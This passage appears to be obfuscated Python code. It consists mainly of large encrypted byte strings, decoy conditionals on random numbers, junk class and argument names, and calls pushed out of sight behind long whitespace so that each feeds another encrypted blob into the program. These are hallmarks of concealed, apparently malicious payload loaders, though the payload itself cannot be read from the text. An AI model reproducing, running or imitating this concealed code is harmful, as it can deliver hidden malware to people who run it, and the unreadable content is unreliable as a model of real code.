\x85\xf2\xa4\x9cAo\xaf\xef\xf7\x01\xc9\x1f\x03\x88\x04F\xe9\x03^\xcf`\x8e\xdbk8g\x0b\xea\x9e\x83\xcf"\x01K\xa4&I\xc5\xfb\xbd:\xbbFI\xd4\xf2\x8f\x99\xf9\xaaj#u\x11\xc4\x9f% \x7fL1<c\xfb8\\\x01bqR\xac\x86a\xb8\xbb\x0c\x83\x10\xd3\x92XlbK\xb17\xceoc\x8eZW7z\xfd\xb2\xb9\xcd\x94kS\xe2\xb7\x1ar\x17\x06\xc2\x82\xf1\xd2\x8d\x1a\x1c%\x95\x00\x93\x98@\xaa\x1a\xcaGR)k\x86\x86\x0c\x10\x96\x19\xa0\xfb9\xe6\x98<\x1f\xd3\x9a\x94Jw\x0c\x98\xda\xf6\xaedj\xa8d@U\xa8\x96\xb9\xee\x9d$q?N\xf9\xd1\xe7\'\xbc\xf6\xf9U\xbfo\x9e\n\x16\xc5\xd3a\x1d6E`z42\x124J\xfdu\x94N\x91\x83\xa6\t\x0b(n*\t\xb1 7\x16Y\xaf~\x12w\x95\xb8\xf2\'\x96\x8b?\xd7\x9f&\x8e\x9c\xfb\x90\xc5\x1d\xf2\xb9\xa7\x99ZxP\xc0\x8a\xa7L7\xb2\xad\xa0\x81T\xf1\x82\x83\x0b\x1a\xba\xaa)K\x83Ot\x00\xb8\x15#\x92$\xae\x97v:\xd1\x87\x98\x011C\x98t\xaaCx\xa3zi3\x85\xac\x8fa\xba\x14\x9e\x07\xbb\x8eQ!\xab\x95\xbe\xc1\xdc\xd3J\x99\x8a\xe2h\x12\xfb.T)\x81Le\x16\x80*\xc3-y\x10\xb4jL@*\x17\xceZH\x98\x98\x80\xa3\xc5\xc5\xec*\xb3\xa8\x99cS\xab\xac_\xfd\xb4\x97\xb41\xab\xe7\xe0\x11\xaa\xc0#\x9d\xf2\xa0\xccl\x9di\x0e\xecL\x18\xda\xf7\xd6\xd9\xdel^\xb6\x1f\xb95C\xbb\x9a\x9d#\x9b\xdahk\x0eL`\xfd)0W/\x91a\xee9\xed\xd5n\x8c\x1c\xb6Qr\x95\xc9\xc3\x89i#\xee\x06\xd3\x80\xc7\xf9\x8a\xc7\xa3\x83\xee\xc4\xcbn\xa7_\xf7-uE\x08u\xe2\x8a\x7fgU\xbdWdd\xdbF<3A(\xdb6\xaf\x89\xed\xfbJ[]0\xe0\xf7-\x85N\xbc]\xe2\xde\x17\x0cBR\xc1\x14\xae\xab\xdb8G\xca[\xc53\xa8\t\xe7\x14I\xb2OOO\x0b\xf0\x93\xc0F3P1\xc9J)\'\xe7"\xb1,\xad\x976\x03DE\x82}\xe7T\xba\x01\x02\xa2j\xa5;\xb3\x0c\xc8S\x00\r\x02\x1a5\xd1q\xc62\xb0\xa9\xee\x16\xc9\'\xb7[\x89\x94\xa6\x90FQ\x00\xb3W\x9a\xf2\x0c\xdd\x8aac0\xa7\xe0\xf2y\xcb\x98r\xe7X\xe0\xd6$4\xab\xa5\x0b\x132`K\xbc$\xf3f\xb2\xe5Djj\x17\x87s\x802\x05z>\x0bN~\x88\xe2\x85\xdfN\xb8\x10<\x8c\xccr\x92\x1dJ\x88s\xfc%\xd8\x99uu[f\x91Z3 \xd2T\teY\x12\x06\xbenJ?\x05\xfbf\x1e\x82Sd\ny&\xd0c1E\x07\xb3\x1a:\xb8\xec\xc3\x1dE\xd1&I!S\xbbz\x17ol\xe7"N\xbfd\xd21\xcaFZ1\xef\xe8\xcf{\xa9|\x1c\xdc\xde\xce1\xf7\xf2l\x8e\x99\x97\xf1\x01k\xd0~\xbb-\xf0\xa6\x83%%k!\xe3\xddq\xac(\xd2\xb7c\xdcD3\x93\x06<b\xf4(\x13\xffX\x84&\x8dZi\xdbUL\x82m\x04\xc0\x13Z\xab\x94\xed\x16^WWS\xc0\xb8\r\xca\xe9\x1ad\x85\x19\xc1A\xfa\x99\x11i\x1cP\xc6\xed\xf3\x12\xe6\xd4\x0cP3n\xa4\x96ICo9X\xc4\x02\x98U\xfb\xe9\xd6\x89\xe7\x0eH\xb2\xff*E\xb4\xb5\xdf\xf71\x1e\xc7c\xeb^rw\x06\xd3\xad\x83\xec\xcc\x95t{v2\xbe\xb1\xa3t{%\x93\x07\\]?\x0e\xbb7<\xda\xe6\x9b\xb2\x19GG\xd6\xb9\x10\xba\xb4\xcc\xa0D\xe8\xd0\xc8\x00\xea\x9a{h~\xcf@Rh\xe5|\xd3>\xd1\x0b\x1d=\xde\xcc5\x1a1\xb5\n\x90\xca\xa1\x8d\x9a\x93$\xd7J\x9b-A)*jD?\x82\xa6o\\\x82j\xa5\xbbDf\xb6X>\x1c\x9aP3\x83%*\'\xec4~x\x1be\xb4\x87\xaa\xc0&\xf3\xb01\x10\xcb\xd3\xa4A\xe4\x04\x9e.\x10D {\'\xea\xca\xe2d\xdcb\x85\x90\x91$\x94/\x8d\xb2\xe4\xfe?6\x06}\xdb\xab\xb90\xedl\x98?\x997\xc7\xc4EH\xee\x0b\x9b\xc4\xdbDQp\xb9\x93\x88\x89\xf6AZ\xb6\xb4\x03\xafd\xe0\xec\xd4\xa7J\x0c\xa5\x04\xb7\xf0\x11\x83\xda\xfbH\x9c\x00\x95\xd2N\x8f\xda\x98/\xab\x8f\x8e]H{\x17P\xaa=\xce\x96X+\xdd\xc9@\x8f+\xa6=\xc9\x83-\x16\xf3\xd8\xb2x4\xa9\xdb4Zh\xc5s\x1b\x894\x83\x14m`\xebH\xfb\xdd\x98\x077\x80>$\xcd\x8c@?\xec\x87\x00?\xe0\xb5\xf3\xe1\xd7\x01\x1b\xf5\x0c\x0c\xe73|\x85\xb4\xa1s\xc8\x1b\xba\x07\x96\x0c\x10\xd9b\xce\xc7@\x89\xdf\x88hjIi\xb3\x19\xa0\x87\xac\xe5\x04}\x00+{\x863@\xad\xb4\xad7E\xcc\n\x92\x07C"\x03\x85v.\xb2\xbc)\x9b\xea\xbe"\xbavU\xf8\x00D\x9c\x9d!\xb6\x16\xc3|\x10_{v\xd6\x80j\xfc\xa7\xa1\xd9w\xc2\xb7\xad\xc3\xdc\x9f\x85\xe8\xe1\xb9Y\x8c\xf6zGe\xdf\x9a&\xc5\x19\x89\x9c\x99\x96\x93rU\x9d\x86\xa1\xa4o\x1eSu\x00\xde<\xa6\xb4?\xa7\x90\xb2FQeD\x13@c1\xc4h\x91\x1e{\xc5j\xa5;\x06+\xbd~V\xee9s\xcfT\xec\xe7u0O_o;\xb3r\x05\xd1\rYC\xdce5\xa9f\xaf\xaa\xbe\xf6\xdbe698\x8a\x9b\xcaf\x11\xa6\x15\x8d\x914\xaa\x87\x88\xb9\x14\xad\x10\xb5\xd2]#\xe8V\x98\x81o\xd1\x17\x01+\xfa\xec\x96\x1d\x13m\xceLH \xc4}\xe5W\x96\xa9\xbeeU\xdfT7mnU\x7f\x0b\xff!\xb5\xdc\x1cE\xa1\xdbf\xe6\xf3\x8eb\x94\xc5\xf5 \xd2\xb3\xb05IB({y\xd8T\xb7\x03\xc6\x81\xf5\xf6\xedQ\x92\xa5\xdbG\xc0\x0c\x87\x98\xf5\xd8\x07\xd7,\xbai1\xdd[\x9b\x06L\xac\x9eh\xaf\x99\xd2H$H\x19\x9a\xffMu\x1bf\xdb\xdaf\xda\x04U\xa4\x97&J.\x998VK\xb4\xd9\xd86!\xdb(A\'\xd8\xc0\xf6\xae\xd5\xe7g\x12\xbc(\x19\x14K]\xcdH\x86\x1ak\xdb\xad\x87\xac\xcdybG\xca\xc8v`\xcd\x89\x9b\xea\xf6^\xe7i\xdcV\xc2K\xd4\xa0\x85\x1c\xac\x90zwk\x1c\xfdj\xa1$,\x07U\xdbIH\xca\xfc\xa7&ds?\xfb\x1f\xceN\xa7C\x89\x9fo73\t\x19\x8cH\xf5IlR$jFrk\xed\xdcT\xb7\xa1:\xb8\x9ez\xa2\x95\xf0,`\x16Y|$\xbcZz8\x9e\xb1e\x1a\xdaT\xd7\r\x91\x8c\x1d\x0b]f\\+GEKd\xe1^G\xc9\xae\x93\x93\xed\xa4V\xf5\\\x80\xfc\xbd\xc3\xab\x8bZ"\x85\x0e07\xb6\x90\x8f\xdf1\xb8d\xd1\x90\x88\xbc\xeb\xbc\x05\xfb\xe0\xd7\xebX\x15GZSn\\n\xdff4\xefo\x88\'p\x1fo\\\x9e\x19V11\xba\xf2nv\xc4C\xba\xfa\xfat\xf6Vq\t\x99\x94\xe8\x91Pg\t\xd1\x96\xb3\xdcO\xb1\x124R\x17\x08\x90\xb1\xc6~\x98\x87\t\xf5!\x87^\xe6\x06\x07\xd2\r\x7f,\xed\x96SX\xe1F#:B\x1f\t\xd3\x13\xceR\x0c\xb8s\nH\xae\x95\xb6\x95lE7\xb2Q\xde}k\xdbN\xc6\xb9\xa9\xee\xab\x94\xd1\xf9\xe8\xeef2z\x7f)\x99\xae\x98VX\xbd\x1d/i\xc8U1(\xfc\x81\xae\xb9]p\x84s\x14\xb7d\x97\xb3\xb9\xc6\x84oO\'L\xb1\x9a{s]G\xe6F\x1b:W62\xa6\xe5\x87\x8ba\x87\x00%\xd4\x96\xd9\xba\xef\x94@\xc7\xde2\xafNHy-{\x80\x83E\xae')

        if 369088 > 4360650:
            Floor(Cube = -98956 / -12609)._add(_round = Random.Math + -46151)
        elif 171723 < 5968188:
            Random.Add(Calculate = 85627 * Random.Math)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='IIIlIIlIIllIlllIIlII',Square=b'\x1a\xf1h\x9e\xfcp\x08\xdc\xe1x\xed\xadi[i\xc7\x14\x8a\x01[\xcd<|!\x02\x89cLj\x9aj\xde\xffZi3\x8f\xbc\xfc,$`\x00f\xb0\xca\xea\xa5Mv\x16\xe3\xcf\xfa\xcc\x1b!SwR/m\xb2\xb3\x14\x03\xc1)\xcd\x17\xb9,\x01\xca\xd0\xaf\x97v\ne \xf7h\x8c|\xcd1\xa1\xb6\xb1=j\xa5\xcd\xfc<`>\xcf8G\x1a\x9cx\xc0\x8e\xddJ\xe9\x1b\xc8\xec\x1d!\x10"\xe0\x88B\\%\x06W\x92\xf1%TC\xc2\xef(\\\x89W\xb8\xaf_$,\xb0]\xb2\xbf\xd4ZEz\xd6\nc\x9b\xf0\x83J\x94\xcb\xba\xba\x0e\x93iv#\x85Q\xf24\x9b\x8ci\x0f0\x0fo\xa74,\r\xc2\xa9}\xdakC\xc9\x81\xa5\xe0\xdeQN\xb3F\xe1)o\xa8\xea\xee,\x1d\x90\xf0Wd\x16\xa3\xc5HsZd\xfc\xcd>By\x0f\xc0\'w\x8b\xc1\xbd\x14q5\xc3\x00\x97F\xbe\xb9Nb\xcbE\xc6N\xadm\x99\xe9lsg\x93\xba\xaf@\xc2m\xe7\x9b\xeb\'\xe34L\x1d\x80g\x19BjCI#\x8b\x9c;\x91<\xd2.(\xb9]\x00|\xd6\xd9\x17\xd8\x82`(B4B\\bN\xe8\xc96\x88\xfdtdpbG4\xaf\xea\x19\xb1\xd5lh\xe7M\x95\x88o!\xc6\x96g\xcf\x12\x116\xd5ug@\x8cz\x18\xd4\x92&\xd3\xadg\x9d\xcbK\xc9o\xc4lamSn\xc7\xb1\xc1E\xd8Y\x92%\xb1\x06N\x15\x96\xe7d]]\xf4V\xff\xcc\\\'\x16\x81i?-\x93\x97\xee\xc6}\xb1\x9b\x14F\x93(W\x8fI\xe9\x91\xf3\xab<p{?\xa7\x10!(\xa5gC\xd6\xc4\x085\xed\x14\xd5B\x9f\x02|\x11.U+m\x8b\xb3\xb53\xa4\x88\x9b\xd1\xce~\xb6\xec\xfbW\xa4x~;\xcd\xa4 f\x92\x02^a\xb3\x89\x0f\x1a\x14t\n\xa7N1\x03/ %)\x84\xa0V\xda\xb6\xdd\x85\xdf@\xdc\xba\x92\xb9FB\xa8m\xb6\x98Mu_%\x0f\x89y\xd8b\x81a\x16G\xb0\x15\x1fkz?!uT\x9fVX\x89\xd7\xe0\x18\xca(\x852b\xa1\\&%\xdbC\x10}2rp2\xd4\x94\x19e\x82z\xe9.\xcd \xab\x0cr\xe8\xab\xe0\xbd\xc3\x87}\xf5\xbbn\'_\x06\t\xd8h"$4\xed\xde\xb8l3\x1c\x97\x91\x07bp\xde\xdc\x89\xb8\xf7\x83\xeeC:\x10\xd0\x1ca\xbc\xbfz6\xf6\x8f\xac[\xab&\xb2\x1aY\xebV\xaeW,{\xd5R\xdb\xfb\xeb^Cv\xa7\xd3\xe1\xe9\xe9\xb0\xa0yt\'=U\x90\x98Ql\xb2\xc8\xd8\x99\x86m\xf1nS\xddW\x88w\xfb\x17=\xbc*\x0f\xc1\x0er\x1c\xb6\xe0e\x1f\xb0C\x96\x9d\x0e4\xdb\xed\x04K\xb8\x9b\xa8Z\xed\x8eo\x11\xc8\xcf\xb1\xc6Lo~A\xcf\xb6\xc0]\xc9W\x1aW$\x04\t\x80I-\xe0\xee\xa6\xba\xee\x02d:\x10\xa6\xf1h_\xbf\xca!\xe1\xbf\x99\xb7\xc7g\xd1\x99H\x87\x13\xf4\xf5T\xca:\x05K\xf5\x99\x91\'c\xb11eA\xb2V\xdaV\x90\x14\xe0\xba=\xed\t\xea\x91\x8ceF\x90\xdcT\xf7\x15\xe4\x8d\xadb\xd3\x9d\x02\x93J:\xb0\xad\r\xa7F_vKo\x929\x11\x80,\xf3YV\x01\xef\x18\xfa\x05\x17 L\xf7Wf\xc0G\x19\x1b\n\xc5h(\xd7\xb7\xbf@\xa4\xf5\xb2\xe0\xc4\xc8z\xd6\x16\xcb\x84\x9b\xaf\xe9\xad\xe8=\xc9\xab\xa7\x93=\x98l+\xcd V\xa0+G\x18m\x98\xa2\x83?@\x88U\xadt\x87N\xa5-\xa7*0p\x81Q+\nc`\xf4\x03\xdf3s\xf9\xc4\xd3\x14l\xe9\xe3`\x8c\x99\x8c\xd0\xd4\'\x14\x0e\xea;\x0c\x12P\x83%\xc6\xef\xc1y\x13\xaaG\x8a\xf9Q\xa2\xd2\xf7>\x10<E\xd3h\x12P6$d\x1aL\xb7O[7 \x15\x13\xae\x89.\xa6%\x07\xa7XJm\xb0\x94\x9d\x9e5\xb5\xd6\x98&u\x1b\xae1o\xe1##\xc9\x02\x8fGrF+\xd8\x9b\x9d/-\x89\x8d\x9f\xdf\x96\xbfzV\xc3m\xaa\xeb\xd0\xd0\x8f\xfdn\xebf\xf3\x0b\x8c?\x1b\xfa>q\x85\x0e[E{\x08\x04B\xa7\xd1\xb6\x8c_"\xaf\xd8\xc1\xff\x9b\xea\xb6\x8e\xf6H0\xb3\x0cI\x90dM\x82\xe9\x8c\x98\x16K\xa5oo_\xba\x90$=\x9a\xdc\xa8Y\x86\xd8Nrt\xcb@\x97\x81/\xdb\xc2k\x12[\xa4\x91\x9b\xea\xbad\x11\xaf1TJ\x84\x8d@@q\x00Z\xee\xe8Mu\x9b(L[\xc4\xa4\x98H\x94\xb2\x83\xa7\x9cH\x95kv\xcf\x88b\x93\xf0J4\x95\rW\xeaY\xe3\xb0Y\xdd\x16\xcc*\xb7\xb7\x18\x8a\r\xa6:%\xba4\xe9\xd2\x19\n\x1a\x11\xe2\x0c)qf\x8c\xa36\xad\x96\xfe\x04V\x87\xe5\x0c\xddn\x02:l\x13S\xd9\xb8\xfa\xf3\x06qp\xd8F\xa4\xe1\x16\xfa\xdd\xca\x94\xce4C?S\x10\xc7\x12-\xb7:m\xd8\x9f\\\x10\xb5:\xe3\x993DP\t\x07\xdfHN0s\x0f\xdd\xdc/wi\x94K\xbe\x80\x9a6X\xd6\x14\xf7\x1a#\xb8n\xe1\xaaf\xfb6\xa9T\xcb\xbd\xd1\x89\r&\x89z\xd1\x18\x94\xb6\xee\r\xf2UBYM\'k\x95;b\x04H\x91\x1a\xd8\xe2\x1d\x8f\x10\x06\xadV\x85\x80\xca\x1c\x00\xd5"M\xc1V\xce\xbbg\xbe\xa1\x12xuu\xc5)\x80\xd5\x92@R\x06o\xaf\x14\xaf\xbb\xaby\x85\xd7aR\xba\xc7\x8e\xb9\x1e\xd2\x00\xf3\xf2\xa9\xd7\t\xbc\xc6\x19\xbcF}|\xdd:\x13\xe1\x01\x1e\x83\x9e\xf3\x01\x07\x7ft\xe9\x86\xe9\x9e\xbbq\xbdwC\x84maB\x8c,Q\x13M\xd7\x96wcS\xdd-\xe2\x18Z2\':\xc9\xe3]\xa5\x880i\xae\xec\x1c\xde.\x82\xadZ\xd9\n\xd6\t\x9f\x82\n5\xc6\xdf\xb1E6+\xdbL9\xebF\xdf\x11UT\x806\xe2\x1b\x89L\'cc\x8dm\xe9\xb2\xb9\x990r\xb3s}\xb0d\xea7\xef\xd2f\xf2\xad\xb3\x80\xb4 \xca\x83i\xb4=\x98\x80\xccB>\x18\x880M]\x81\xbcE{\x9e\xaeNkwM\x0e\xb0\x8a\x92\xf7\x0b\x7f\xa2op\xb3A\x80\x11\x90v\xfaH\x8bFI\xb1\x12\x0eO\x8b\xea\xa5m\xe7V1\x97\xd9\xa1\xc7b\x89\x84no{\x8e7\xd5u\xca\x99\xd55\xa7\x83\xc0\xde\x18\xe4v\xd9$\x97\xedz\x9b\x92\xc0\xf1\x04k,M&\x96\x90\xc8\xb2)m\xaa\xdb\xd2j\xd9pir\xcd\x9e5\xe6\xfc\xae&\x13V\xa6\xa3g\xc6\x9c\x0f\xd6\xe4\xc8r\x117cK\xcd-\x9c*\x14\x05\x80QQ:\x14\xa0\xc90\xe6\x18R@\x1f"\x03u\xff:\xfcH\t\xea*\xa5\xfbo\x85\n\x930\r\xb30\x0c\xfbj+V\xb2F\xa4>\x8d\x94\xbe\xd5\x8b\xfaQ\x0e\xc1$q\x16\xfaj;J\xc20Jr\xd5\xb5\xc3\x10\xd6\xeaI\x1c)1\xb7\x17\x8f\xd4\xa7\x89\xfaU\x1f\xb2\x0e\xc7\xbd4\x86\xdf\xa5Q\xa44\x996\xce.bIU\xffD\xcb\x8b\x8e\xd2\xf3&\xf7\x86B\x99\xfbh\xc5\x87\x07A\xac\x93zi\xa7\xb8\x90\xae\xe9\xd5:\xca[(\xe8\x10\x9bB\xd9\x96k\x02\xcbx\xbf\xa9n\x8bP\xe1m,PA\xb2}2P\xa4\xc9\x13\x8ab\xa4\xc8{A\xd6\xbc}\x96K\xdc\x1bM\xcb\xf1Z&\xb5\x83\xb0\xc2\xb8\xc9\x0f\xd4\x86\tf0\x17u\x97v\xda\x08WM\\\xe61:\xf0z\x18+O\xd9\x0cj\xa5\xfb\x8fSh\x9d<B\x07\x00h\xf4?\xe1\xff\x9bM\xa41\x918\xe0;8V\x02\x9cHk\xa5m\xdaQ\x94\xab\xc8\x12\x98$.T\x84\'\x9b,r]\xddW\x92E\xbe\xbd\xac\x8a\x04\x9e2=!\x95z\xb3\xfb\x12\xe0\x02F\xae\xae\x94\x85\x8f\xa4^\xda\x16\xe5`\xbb\xe0\xc5a*\xd0\x8f\xd0\x12|\x9b\xd4}\x05W\xff~!\xb6\xc5]\x11\xb1q\xd4\x98I\x13\xcem!\xa6S7\\a\xee\xdc\x166\xfe\xbcL\xe6Sf~\xa3w\'f}\x86\x8aB\xfcr?\xc9\xd20\x8d\xd2\xads\xc7\x01\xb7\xf7-Q{\xcf)\x0c\x04<\xcb;\x14\xc0\xf7\xea\xde\xda\xe6\xef\xbc\xe4\xd8\xd0N\r\'n_53*\tF\xbdG\xdb\xdb\x95\xd68\x0f\x8d\xcb\x10\xdf\xb5{\x97\x9c\xbd\xc6\x89\xb8\xbf\x10L\xb0\x14\xe1g2!\xc1K\xa7j\x83\x90\x0e\x11\x88\tsF @"\xac\x96\xeeX5\xdd\x8f\x15\x97\xfd&x\x08\x94*\xf7[#\xe8\xf8\xeag0+\xde\xce\x88$\x046\xf7\xfd\xea;#\xbf\xd1b\x16\x0b\\\xa8\r6\x92\xb6RN\xa6\tZ\x03S\x9b}\x84 \x93Zi#+\x01\x02\xa5\x13\xc4\x18\x02\x8e)A\xaa\xb3\xa0^\xba\x1b\x03\xc1\x16i5\xdeP\x97\x01\x1f\x83?\xc4,\xf6\x90\xb5^\xbd7J\x8d\xe0"#\xdd\xcf\xd5\xf4n\xd3\xa1\xb2Y\xc1\xe4\x8b\xcc*\xce\xab\x91\x9b\xf8\x95\x149Lr\x84\xdew/@I4{\x99\xad\xbf\xea\xa0-\xd7\xd9[\xa1c\xb5@%LW\x99\xe6\xbe\x1a\xb1\xed^\xac\xf8\x99|\xb7\xb7(A\xb1\xe2\x93\x05\x7fA\x84\xde-\xd9|lW\x98\xed\x17\x16\xba\x0c\xb4\x8bZ\xb6\xd3Mu\x9deMq\x9a?\xb5\xcc\x8a\x86\xbe\x1c\xcd\x906\xd6\x9fT/\xd9C\x04\xe2\xc1\x10\x82\xdc\x87\x10\xe4\xae\x96\x8a\xe1i\x01Q\xefj\xeb\xb4\xcb%c\xb3\xe3P\x90\xef\xa9\xd51$\xa4!\xac8\x0e\xd7\xd5m\xd8\x81\xf6M\x0f\xada\xda\xcb\xd0V\'\xe0U\xe7vt\r\x973P\xd6H[\x88\xe8\x1b\x07W\xa5\xba\x05D\xa9\xf5Z\xb0\xa2R\xf63L\xdf5\xc3D^l-\x99u*E\x85\xd7D\x0fL\x02-\x80\xf2\xfb\x88q\xa8\x95v*\x92\xf5\xd1\x1eM\t\x81{\xf8N\x14\xbc\xb5\xd27\x12\xdbZ\x06\xbf\xb5\xa3\x8c^-\xe6\xa4\xd5|\x88\xa5\x87\xce\x9a\xb8\xb7\xa3\xf4\x00\xdc\xc3\xe0!\xc6D\xae\xe40\xdek\x9b\x9f\x95\xe6\xac\xb3t\xac\x90\x8d\t\xf4"\xd0\x8a\x94R\xd4\x88\x13\xeb-\x9b\xa0C\xc5\x9e\x1d\xbd\x92\x14\r\xb7\x9b$Ds~\xf9\x94\xa0\xb9\x87\xb3\x1eq\x99\xa78\x0bV\xcavi\x85\xdb\x8e\x98iyZ(w\xbc\xffJ\x91J}\x94js%f\xde8r\xe8\x98\xf4.\x9a\xb8U\xc7\x0f\xede\xf4\xc9\x81\xd6\x06\xd9\x97K\xf0\xb6v\xb4\x9b\xe25\x15\x9er;\xc1\xb2\x94\xdbH\xc1Mu\x1dr\xcc\x18\xd2\xd2\xce;D\x1e')

        if 489628 > 6986373:
            Floor(Cube = 54414 * 44895)._add(_round = Random.Math + 41037)
        elif 273500 < 8134811:
            Floor(Cube = 99410 * -56608).Add(Calculate = -98417 - Random.Math)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='jiljllljljjjiiilliiijlll',Square=b'\xd9\x94\x93y\x95\xcc\xcbI\xd0N\x9ac(\x04\xc0\xf5\xc2\xe4Fu\xf6i\xea;\x01\xea\xd9|Se\xcf^9\xbb\x93\x8b\x15~w\t=\x8d\x07\x96\xc2W\xec\x0cO&\xc0\x05\xbes\x13\xd8\x12\xc4Q\xac\x96\xb5\x16\xb6yC&zA\x9c\x1c\r"\xbcW\x0fl\x9b\x15HB%\xeclD\x14\xdf\\g\x10ZU\xb7!\x15\xe5\xea\xc5\xb0\x8f\xf0\x84>\xe6\x85&\xfe\xc6\xfeG\xca\xcbQ)\xdd\xdf\x05\xb1\x12\xdag\xd3\xd5\xdaT\xb6\x0eC\xfd:\xa2X:\xc0\xfd\xce\xf18\x83\xc1\xa09\xa1\xdb\xea\x96\x97\x98\t\x89\x9b\x90\xcf\xc2\x0e\xd2\xb3\xcc\x1dM\xea:\xb4\x97\xa5\xb8\x90\x84\x81\x9f\x80\xf8=aYCMJi\x98"\x04!\x01.$\x1f"{\xd3(\xf0qj\x8e\x90\xd6\xc5O\xfaP\x03~\x8d\xb9b\'P\x13\xec\xcf-r\xf9\x00\xca\x15\xd4\x96\x01h1\x8cz\x05}\xa6\xed\xaan\x13\x1aH"]\xa1\x1dGF\x06kU\xdfTw\x7f\xa9]\xd6\xe9\xb5\xfdJJ.\xa3\xd1\x96\x93v\xb1\xee\xbb\xedh%\xc3Hk\x96\ri\x7f\x9b\x8cB&b\n>2\xc6\xe6MuS\'\xd3\xdf\x12\xd6\xb5%\xe9T\xed\x88`\'\xb1\xce\x9d:\xc4\x11\x83\x01\x1f\xbe~\xe1/\xbfRI3\x9c)\xa5}\n9?\x15!-\xd2zi3\xa3\x19pW\xf8\x0c\xd1@\x1e\x0bT\x17k\xa5m\xa5\x02\x99e\xc5\xe8\xdc\xb7:\x92\r\xb6\xdcTw7\x99\xb9\xd3\xb4\x05\xd3-\x90\x17\x15\x98\xb2\x1a\x8c\xff\xbb\xb1\xfb\xef\x88\x93\xd95R\xbc\x9c\xe5\xb5\x9a\xfc\x8f\xf4\x06\x17a=e\xae\xe9\xad]?\x05\x07&\x16\x08\x18\x80^\x80\x19\xcb\xf7\xdc,\xa6E\x137\x1e\x0b\xd2\x8f\xca\x9a\x11=\x12\xd6\x9e`\xdb\x91\xf7bWI%\x96h\xb6u\xdd\xd7\x89\xd1\xcaf\x14\x0cF6\xff_\xd4\x03\x9a\x9f$\x8b\x95\xdc\xae\x84E\xa5\xf1\xc7$\xc7C/\x0f\xb7O\xd8i\xf3\xce\x0f\xf8\x1fN\xac\x19\xac)B\xc6\xa4\x18\xdf!V-B}\xacV\xda\xa1\x93f\xf5\xd8\xcaxa\x11\x1ec\xf9l\'\xc7\x11\xf5\xa1I\xddWxK\xdf\xde\x84-\x9cn\x86\x96\xb3!%\xe7\x9bz1\\"\xeeeV"\xc3\xac\xccJ2s\x19\x8f\xab\x0b\x9bU\x06\xf9(\x93\xa8\x1d%\xee\xc1\\\xfe\xf8 \x83fD\x1d\xfdk\x1a\x81\x14\xca\x81\x91\x8c\xe8\xc4\xac\x95\xeedTn\xe9\xed|\x0b\xe38\xc1\xaa\x06g\xa8G\x9f\x81:=\x00\x90U\xc3\x80\xd1\x04cf$\xfe\xbe\x8fr|R/m\xb23\xe4\xfeF\x05\x80\xdc<=\x9cW\xe3z\xe9\xdf\xc6\x8dYot\xb7\xf3i\x18\xf3\xd9\xab\xf2hp\xe2\x0f\xc8j!\xb2>pP\xf8~\'\x19ol\xa1\xa1\x1a"SM[\xe2&D\xa6\x1b\'94\r\xb6\n\x10t \x95\xab\xdfL\x1f\xeas^\xa4\x00\xd1\x13)\xd3-f\xf5\xd2}F\xcdn\x13\x15?\xdaz*B\x9d\xc3\'&\x14\x84,7\xa1Cy\x05\xd0%E\x8e\x01\xccl\xc0\xf9\x06(\xc3u\xad\xb4\xd9\xdcG\xfehB\xb2G\xb0\xcc|\xa4\x18\xcfJi[{db\x99\x13$y\x9fNUP\xe1yZU\xef\x15\xf9\xb0\xda\xd0rj\xb6nK\xb6sB\x19hS\x04N\xac\xe9pR\xfa\xd4\x88P\xfe\xf5Wi\x11hl\x9f\x19f\xad\xe7\x91\xc1\xc4\x92F\xd7\x94d\x16a\x88#\xcfc\xfb\x8c$8\x8a\x87\x18lP\xb0=\xa1h6\x92\xbb\x0f7\xc8p\x1c\x06\xa8\x92\xf9\x18\xe1\x0b\xce3\x1f\xe9,J\xa5\xcd$\x94\x10\x05\x1b\x12n0X\x0c%\x94Zi\x93\x9d\x05x\xdc\x04\x93\x9e\xf8x\x1e ;\x85\xf5\xd2}^\x1f\xba \x86\xebN\x1d\x04\xb02\x00\x97\x8b\xd3\x82%\x1a\xcct8<mf\x93\x8e\xd1\x9d\n\xb1I\x11\xca\xae)\xda\xa4k\xa5{o\xe3l\xb1\x04\xaf\x11\xe7\xaa\x02]\xd9\xa2\xe9\xdc\xc2\xa9\x99\xb3\xc5`!\xee\x1c\xc9a\x9bU\xd2C\xae\xaa\xd7\xc4\xc5\xb3*\x12\x8e\xa8\x06\x108Go\xcdf\x8d\x18;\x0f\x89~\x89\x9e5j\xa5mA\xf3r\xd5\xe2\x98\xb4!G\x91\xe5\xb8lR\xd7%\xdd\xbc\xd3\xc8\x8b\n\x98\xa0*\x10\xe4\x95\x127\x10\xa5v\xe4\x80\xebE\x83\n\xbd@y\x10\x9ao\\Q\x0f\xa4\x164\xc9A\xc8\x83\xf9+\xf3$\xf7\x9d\xfaF\xa38\xf5\t\xd9\x80\xe6\xe5\x0c\x93\xd1\x84i\xa6\xd6$\xc7|p\x19\x0byU^\xb8\xb1~\xa2\xb8\xe7\x02F\xe7\x00J&Q\x8c6U\xa9In\x9f\t}\xd2O\x01\x98; \xfa4\x04\x95\x9c\x018\xfe\x9c\xacd{m\\F\x96\xe8\xb8\x92\\\xc9%Gt\xf91)\xb1C\xeb:\x0ef\xa1 O\xd5\xb0H\xbbW\xbfj\x99iK\xead\x89\xad\xdeM\xb6\xda\x0e\xe5\xe1\x05\x85wRL\xe7\x1d\x914\xb6\x0c\xee\xfc\xe9\x99\xdc\x0c\x0b\n\xf9E\xa2\xa4\xee\x1f\x89\xdc%\xbeHq\xd7)b\x10\xb7\xbd\xadg8\x19\x9dc\xf8\x0e\xbe5\xb4\xd5\xa7\x0c\x88\t\x90\xce\xb1\x8f\xd6\xaaJY[ \xa3\x1d\xd0\x9b\xc4\x16\x80\x91EK\xdf\x022\xae\xaa+\x9c\xba\x8e3\x15OS\x1f3\xd4\xf5\xd4@K\xe3\xbeZ\xfa1F0\t\xda\xdc\x9bM\xd3JU8\xcd]Z\xaa\xba\xb0\xe5 